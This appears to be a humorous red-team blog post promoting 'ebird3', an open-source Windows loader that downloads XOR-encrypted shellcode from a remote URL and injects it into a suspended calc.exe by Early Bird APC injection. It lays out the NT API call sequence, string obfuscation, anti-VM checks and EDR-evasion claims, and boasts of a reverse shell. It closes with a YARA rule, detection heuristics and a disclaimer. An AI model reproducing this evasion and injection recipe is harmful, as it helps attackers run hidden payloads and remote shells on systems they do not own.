Day 47 of 365: Mastering Pentesting with LazyOwn RedTeam - Daily Command...

> By: grisun0, White Hat Blogger & Chief Overthinker of Suspiciously Suspended Threads
5 min read · Probably posted at 3 AM because sleep is for the weak and the non-redteam

“The best way to be ninja is to inject into a calc.”
— grisun0 (probably xd)

Let’s cut the fluff.

If you’re reading this, you’re either:

• A red teamer who just spent 4 hours trying to make notepad.exe whisper secrets in Morse code,
• A blue teamer who found calc.exe establishing a TLS connection to Antarctica and now questions the nature of reality,
• Or someone who Googled “how to make Windows do the robot” and ended up here.
  (Spoiler: It’s easier than you think. And yes, the robot dance is included in the shellcode.)

Welcome to LazyOwn RedTeam™, where we don’t break systems — we educate them into submission.

Today, we’re unveiling ebird3 — my latest love letter to the Windows kernel, written in C, compiled with rage, and delivered via a technique so elegant, even your grandma’s antivirus won’t see it coming.

And yes — there’s a surprise at the end.
Spoiler: It involves a calculator.
Bigger spoiler: The calculator is now a reverse shell.
Even bigger spoiler: It’s still faster than your company’s IT ticket system.

🐣 What Is Early Bird APC Injection? (Or: “How to Hijack a Process Before It Even Wakes Up”)

Imagine this: You create a new process — say, calc.exe. But before it even opens its eyes, before it checks its email, before it mutters “Why am I always the target?”—you sneak in, inject your shellcode directly into its thread, queue an Asynchronous Procedure Call (APC), and then let it wake up.

It’s like sneaking into someone’s house, redecorating it as a spy lair, and then gently shaking them awake saying, “Surprise! You’re a cyber-agent now.”

This is Early Bird APC Injection — a stealthy, native, and gloriously underrated technique that bypasses most userland hooks because the process never runs its original code. It’s born already compromised.

And ebird3?
It’s not just a tool.
It’s a cybernetic assassin with string obfuscation, anti-VM checks, and a HTTP client that doesn’t rely on WinINet—because why use the front door when you can tunnel through the basement?

🔧 How ebird3 Works: A Ballet of NT API Calls and Digital Deception

Let me walk you through the graceful violence of ebird3:

1. String Obfuscation: “I Can’t See You, You Can’t See Me”

All strings — URL, process path, User-Agent — are XOR-encoded at compile time with a user-defined key (default: 0x33, because why not).

unsigned char OBF_SHELLCODE_URL[] = { 0x12, 0x34, … }; // “http://192.168.1.100/shellcode.txt” but cooler

At runtime, they’re decoded in memory — never touching disk in plaintext.
Because real hackers don’t leave IOCs. They are the IOC.

2. Anti-Analysis: “No Sandboxes Allowed”

Before doing anything, ebird3 checks the BIOS version in the registry:

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion

If it sees VMWARE, VBOX, QEMU, or XEN?
Game over. Exits silently.
No crash. No log. Just poof — like a ghost who read the room and decided it wasn’t cool enough.

3. Manual HTTP Client: “I Don’t Need WinHTTP. I Am the Web.”

Forget WinINet. Forget curl.
ebird3 uses raw WinSock to:

• Resolve the host
• Connect via TCP
• Send a minimal HTTP GET request
• Parse the response body
• Extract \xNN\xNN... shellcode
• XOR-decrypt it on the fly

All without a single external dependency.
It’s like building a spaceship out of duct tape and spite.

4. Early Bird APC: The Injection

Here’s the chef’s kiss:

1. CreateProcessA(“calc.exe”, …, CREATE_SUSPENDED); // Nap time, little process

2. NtAllocateVirtualMemory(hProcess, &mem, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

3. NtWriteVirtualMemory(hProcess, mem, shellcode, len, NULL); // Drop the payload

4. NtQueueApcThread(hThread, (PAPCFUNC)mem, NULL, NULL, NULL); // “Hey thread, when you wake up… do THIS”

5. ResumeThread(hThread); // *snap* Wakey wakey, eggs and payload

No WriteProcessMemory? No CreateRemoteThread?
Because those are for amateurs.

We’re using NT Native API calls from ntdll.dll—bypassing EDR userland hooks like a ghost through walls.

And since the APC executes before the main thread starts, no hook can catch it.
It’s not evasion.
It’s invisibility.

🛠️ Why ebird3 Is the Swiss Army Knife of Ethical Evil

• ✅ No Dependencies — Just ntdll.dll and ws2_32.dll. It’s like a survivalist, but with better opcodes.
• ✅ Obfuscated C2 — Your shellcode URL? XOR’d. Your User-Agent? XOR’d. Your dignity? Also XOR’d.
• ✅ Anti-VM — Sandboxes? Denied. Analysis? Thwarted. Paranoia? Validated.
• ✅ Small Binary Size — Compiled with -Os and -fno-stack-protector for maximum stealth and minimum bloat.
• ✅ Educational AF — Want to understand APC injection, NT API abuse, or how to make Windows cry? This is your lab.

🎭 But Wait — There’s More: The LazyOwn Ecosystem

ebird3 isn’t just a standalone tool.
It’s a node in the LazyOwn RedTeam Framework—a modular, extensible, and slightly unhinged ecosystem of offensive tools.

Imagine this:

• You generate polymorphic shellcode with ShadowLink
• Obfuscate it with LazyAddons
• Deliver it via ebird3
• All orchestrated by LazyOwn from a C2 server that looks like a cat meme blog

And the best part?
It’s all open-source.
(Because transparency is the best opsec.)

🎁 THE SURPRISE: A Calculator With a PhD in Hacking

👉 Watch it in action

Yes. That’s a Windows calc.exe:

• Created suspended
• Injected via NtQueueApcThread
• Running XOR-obfuscated shellcode
• Calling back to a Malleable C2 profile
• All while Task Manager says “Looks normal to me”

And it’s not even using admin privileges.
It’s just that good.

🛡️ Detection? LOL. Here’s How to Catch It (For Blue Teams)

I’m not just a red teamer. I’m a responsible red teamer. So here’s some free blue team intel:

🔍 YARA Rule (Basic IOC)

yara

rule ebird3_EarlyBird_APC {

meta:

author = “LazyOwn BlueTeam Analyst”

description = “Detects ebird3 Early Bird APC injector”

license = “GPLv3”

strings:

$ntdll_imports = “ntdll.dll” ascii wide

$nt_funcs = (

“NtAllocateVirtualMemory”

“NtWriteVirtualMemory”

“NtQueueApcThread”

“NtClose”

)

$create_suspended = { 6A 04 6A 00 6A 00 6A 00 6A 00 6A 00 } // CREATE_SUSPENDED

$xord_url = { 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? e8 ?? ?? ?? ?? 83 c4 08 }

condition:

all of ($nt_funcs) and $ntdll_imports and $create_suspended and $xord_url

}

🕵️ Heuristic Alert

Look for:

• NtQueueApcThread being called on a suspended process thread
• Memory allocated with PAGE_EXECUTE_READWRITE
• HTTP requests from calc.exe or notepad.exe with a legit User-Agent

If you see that?
You’ve been ebird3’d.

⚠️ Disclaimer (Because Lawyers Exist)

This tool is released under GPLv3 and is for educational and ethical red teaming purposes only.

Do not use it on systems you don’t own or have explicit permission to test.

Misuse may result in:

• Getting fired
• Getting sued
• Getting haunted by the ghost of Linus Torvalds (he’s very serious about licenses)
• Your calculator developing self-awareness

I assume zero liability. You’re on your own, cowboy.

🔗 Links (Because Sharing Is Caring)

• 🐙 GitHub: https://github.com/grisuno/ebird3
• 🐙 DeepWiki: https://deepwiki.com/grisuno/ebird3
• 🧠 LazyOwn Framework: https://github.com/grisuno/LazyOwn
• 🤖 ShadowLink: https://github.com/grisuno/ShadowLink
• 💬 Discord: https://discord.gg/V3usU8yH
• 🌐 Web: https://grisuno.github.io/LazyOwn/
• 🧑‍💻 HackTheBox: https://app.hackthebox.com/users/1998024
• ☕ Ko-fi: https://ko-fi.com/Y8Y2Z73AV (Buy me coffee. I’ll use it to fund more questionable decisions.)

🔚 Final Thoughts: Stay Sharp, Stay Sneaky, and Never Trust a Calculator

Tools like ebird3 exist to help us understand the battlefield.
To train blue teams.
To test defenses.
And yes—to make calc.exe do things it was never meant to do.

So go forth.
Learn.
Test.
Break things (ethically).
And remember:

The best security is the kind that makes you question whether your calculator is judging you.

🔐 grisun0, signing off — from my C2 server, probably running inside your printer.